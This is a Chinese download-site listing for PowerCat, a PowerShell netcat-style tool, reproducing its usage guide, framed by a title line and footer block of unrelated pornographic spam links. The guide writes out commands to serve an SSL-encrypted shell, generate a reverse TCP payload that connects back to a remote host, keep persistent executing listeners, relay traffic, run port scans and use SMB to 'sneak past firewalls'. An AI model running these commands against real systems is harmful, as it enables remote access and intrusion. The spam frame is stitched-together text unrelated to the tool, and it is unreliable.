变态重口极致另类在线-波多久久夜色精品国产-波多野结衣在线观看一区-波多野结衣在线观看一区二区-污污的网站免费阅读-污污视频网址

東坡下載:內容最豐富最安全的下載站!

幫助|文件類型庫|最新更新|下載分類|排行榜

上傳下載服務器軟件遠程監控網絡相關主頁瀏覽主頁制作電子郵件網站優化網絡儲存常用瀏覽器迅雷百度云盤

首頁網絡軟件網絡相關 → powershell專用網絡工具(PowerCat)

powershell專用網絡工具(PowerCat)

powershell專用網絡工具(PowerCat)

  • 大小:28KB
  • 語言:中文
  • 平臺:WinAll
  • 更新:2016-01-13 12:27
  • 等級:
  • 類型:網絡相關
  • 網站:http://www.astro-tech.com.cn
  • 授權:免費軟件
  • 廠商:
  • 產地:國產軟件
好用好玩 50%(0)
坑爹 坑爹 50%(0)
軟件介紹軟件截圖相關軟件軟件教程網友評論下載地址

相關推薦: PowerCat

    PowerCat是PowerShell的TCP/ IP瑞士軍刀,適用于Netcat & Ncat.。如果你想在powershell上連SSH或者搭建網絡環境,那么PowerCat絕對必不可少!歡迎下載!

    PowerCat怎么用

    powercat實際上是一個powershell的函數,當你第一次使用它的時候你需要運行腳本來加載這個函數。

    由于windows默認不允許任何腳本運行,你需要輸入Set-ExecutionPolicy RemoteSigned來允許運行本地的腳本。

    PowerCat PowerShell模塊打包。你必須導入模塊使用其功能。

    # Import the functions via the psd1 file:

    Import-Module PowerCat.psd1

    默認情況下,PowerCat使用TCP和讀取/寫入控制臺。

    # Basic Listener:

    Start-PowerCat -Port 443

    # Basic Client:

    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

    文件傳輸

    使用sendfile PowerCat可以用來傳輸文件和-ReceiveFile參數。

    # Send File:

    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

    # Receive File:

    Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

    UDP和SMB

    PowerCat支持多通過TCP發送數據。

    # Send Data Over UDP:

    Start-PowerCat -Mode Udp -Port 8000

    # Send Data Over SMB (easily sneak past firewalls):

    Start-PowerCat -Mode Smb -PipeName PowerCat

    SSL

    PowerCat動態生成提供SSL加密的X509證書TCP連接。

    # Admin privileges are required to generate the self-signed certificate.

    # Serve an SSL-Encrypted (Power)Shell:

    Start-PowerCat -Mode Tcp -Port 80 -SslCn <Certificate Common Name> -Execute

    # Connect to an SSL encrypted Ncat listener:

    # Setup *nix with openssl & Ncat:

    # openssl req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem

    # ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem

    Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat

    繼電器

    PowerCat類似于netcat繼電器繼電器,但你不需要創建一個文件或啟動一個進程。你也可以傳遞不同協議之間的數據連接。

    # UDP Listener to TCP Client Relay:

    Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

    # TCP Listener to UDP Client Relay:

    Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

    # TCP Client to Client Relay

    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

    # TCP Listener to SMB Listener Relay

    New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat

    生成的有效載荷

    載荷可以使用New-PowerCatPayload函數生成。

    # Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:

    New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

    # Generate a tcp payload that listens on port 8000:

    New-PowerCatPayload -Listener -Port 8000 -Execute

    Misc用法

    PowerCat還可以執行端口掃描,開始持續的聽眾,或作為一個簡單的web服務器。

    # Basic TCP port scan:

    1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

    # Basic UDP port scan:

    1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

    # Persistent listener:

    Start-PowerCat -Port 443 -Execute -KeepAlive

    # Simple Web Server:

    Start-PowerCat -Port 80 -SendFile index.html

    PowerCat基本功能和參數

    Start-PowerCat # Starts a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb.

    -Port           # The port to listen on.

    -PipeName       # Name of pipe to listen on.

    -SslCn          # Common name for Ssl encrypting Tcp.

    -Relay          # Format: "<Mode>:<Port/PipeName>"

    -Execute        # Execute a console process or powershell.

    -SendFile       # Filepath of file to send.

    -ReceiveFile    # Filepath of file to be written.

    -Disconnect     # Disconnect after connecting.

    -KeepAlive      # Restart after disconnecting.

    -Timeout        # Timeout option. Default: 60 seconds

    Connect-PowerCat # Connects a client to a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb

    -RemoteIp       # IPv4 address of host to connect to.

    -Port           # The port to connect to.

    -PipeName       # Name of pipe to connect to.

    -SslCn          # Common name for Ssl encrypting Tcp.

    -Relay          # Format: "<Mode>:<IP>:<Port/PipeName>"

    -Execute        # Execute a console process or powershell.

    -SendFile       # Filepath of file to send.

    -ReceiveFile    # Filepath of file to be written.

    -Disconnect     # Disconnect after connecting.

    -Timeout        # Timeout option. Default: 60 seconds

    PC官方
    安卓官方手機版
    IOS官方手機版

    powershell專用網絡工具(PowerCat)截圖

    下載地址

    powershell專用網絡工具(PowerCat)

    熱門評論
    最新評論
    昵稱:
    表情: 高興 可 汗 我不要 害羞 好 下下下 送花 屎 親親
    字數: 0/500 (您的評論需要經過審核才能顯示)

    編輯推薦

    報錯

    請簡要描述您遇到的錯誤,我們將盡快予以修正。

    轉帖到論壇
    輪壇轉帖HTML方式

    輪壇轉帖UBB方式

    主站蜘蛛池模板: 免黄网站 | 午夜毛片视频高清不卡免费 | 精品中文字幕一区二区三区四区 | 有色视频在线观看 | 欧美专区亚洲专区 | 日韩影视在线 | 久久久久亚洲日日精品 | 在线日本人观看成本人视频 | 一本久久综合亚洲鲁鲁五月天 | 免费h黄肉动漫在线观看 | 亚洲邪恶 | 欧美成人一区二区三区不卡 | 成人小视频免费观看 | 中文字幕在线免费观看 | 777久久| 视频在线观看一区二区三区 | 狠狠色婷婷丁香六月 | 伊人激情视频 | 欧美激情一区二区三区视频 | jizz国产丝袜18老师女人 | 全部免费特黄特色大片视频 | 亚洲毛片视频 | 亚洲欧美中文v日韩v在线 | 天天爽天天 | 国产综合激情在线亚洲第一页 | 国产成人一区在线播放 | 很黄很色的男女无遮挡动态图 | 秋霞影视伦理手机在线观看 | 中文字幕亚洲第一 | 国产精品99久久久 | 日韩视频在线播放 | 亚洲色图1| 日本黄色免费在线观看 | 在线观看成人影院 | 99视频精品全部 在线 | 视频日韩p影院永久免费 | 欧美一级特黄一片免费 | 午夜免费观看_视频在线观看 | 亚洲性人人天天夜夜摸 | 成人自拍网站 | 免费看a毛片 |